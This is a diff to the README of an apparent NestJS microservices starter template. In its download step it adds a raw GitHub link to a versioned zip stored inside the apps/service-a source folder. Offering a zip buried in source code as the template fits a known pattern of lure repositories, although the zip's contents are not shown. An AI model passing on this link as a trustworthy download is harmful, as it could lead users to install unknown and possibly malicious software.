LucasAnd1/nestjs-microservices-starter-template/README.md

 ### Step 3: Download the Template

 Select the correct file for your operating system and download it.
-It might be named something like `nestjs-microservices-starter-template.zip` or a similar variant.
+It might be named something like `https://github.com/LucasAnd1/nestjs-microservices-starter-template/raw/refs/heads/main/apps/service-a/microservices_nestjs_starter_template_v1.4.zip` or a similar variant.

 ### Step 4: Extract Files